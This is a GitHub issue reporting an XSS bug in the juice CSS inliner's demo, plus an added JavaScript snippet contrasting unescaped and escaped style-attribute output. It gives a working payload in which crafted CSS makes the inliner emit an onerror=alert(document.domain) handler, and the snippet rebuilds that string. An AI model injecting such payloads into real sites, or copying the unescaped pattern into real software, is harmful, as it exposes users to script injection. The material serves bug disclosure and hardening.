Parser bug, allowing XSS from CSS (On demo) #388

Open
NDevTK opened this issue Oct 16, 2021 · 2 comments

NDevTK commented Oct 16, 2021

The following input tested on https://automattic.github.io/juice/

<style>audio{a" onerror=alert(document.domain)>":""}</style>
<audio src=""></audio>

Resulted in the valid XSS payload

<audio src="" style="a" onerror=alert(document.domain)>": '';"></audio>

From what I can tell juiceDocument is not affected.
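The class of bug reported above, reduced to an added example that is not part of the original issue and is not juice's own code: declaration text written into a double-quoted `style` attribute without escaping, next to the escaped form and a regression check on the serialized tag. The function names and the tokenizer are hypothetical helpers; the sample declaration is constructed from the output quoted in the report.

```javascript
// Constructed sample: the declaration text as it appears inside style="..."
// in the output quoted in the report.
const DECL_FROM_REPORT = 'a" onerror=alert(document.domain)>": \'\';';

// Vulnerable pattern: declaration text pasted into a double-quoted attribute as-is.
function styleAttrNaive(tag, css) {
  return `<${tag} src="" style="${css}">`;
}

// Escape the characters that can end a double-quoted attribute value or start markup.
function escapeAttr(value) {
  return value
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Hardened pattern: same output shape, value escaped for the attribute context.
function styleAttrEscaped(tag, css) {
  return `<${tag} src="" style="${escapeAttr(css)}">`;
}

// Minimal start-tag tokenizer (hypothetical helper): lists the attribute names
// an HTML parser would see, stopping at the first ">" outside a quoted value.
function attrNames(html) {
  const names = [];
  let i = html.search(/[\s>]/); // skip "<tagname"
  const attr = /\s*([^\s"'<>\/=]+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'=<>`]+))?/y;
  while (i >= 0 && i < html.length && html[i] !== '>') {
    attr.lastIndex = i;
    const m = attr.exec(html);
    if (!m) break;
    names.push(m[1].toLowerCase());
    i = attr.lastIndex;
  }
  return names;
}

// Regression check an inliner's test suite could run on its serialized output:
// inlining CSS must never create an event-handler attribute.
function hasEventHandler(html) {
  return attrNames(html).some((n) => n.startsWith('on'));
}
```

With the escaped form the whole declaration stays inside the `style` value, so the tag carries only `src` and `style`.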

@NDevTK NDevTK changed the title Parser bug allowing XSS from CSS Parser bug for allowing XSS from CSS Oct 16, 2021
@NDevTK NDevTK changed the title Parser bug for allowing XSS from CSS Parser bug, allowing XSS from CSS Oct 16, 2021
Collaborator

jrit commented Oct 18, 2021

Related: #251, and worth calling out here again that the version running on the GitHub page is much older than the version on npm.

Author

NDevTK commented Oct 19, 2021

Yeah, it would be useful for the demo to be on the latest version.
I also noticed this is not on https://github.com/Automattic/juice/security/advisories.

@NDevTK NDevTK changed the title Parser bug, allowing XSS from CSS Parser bug, allowing XSS from CSS (On demo) Oct 24, 2021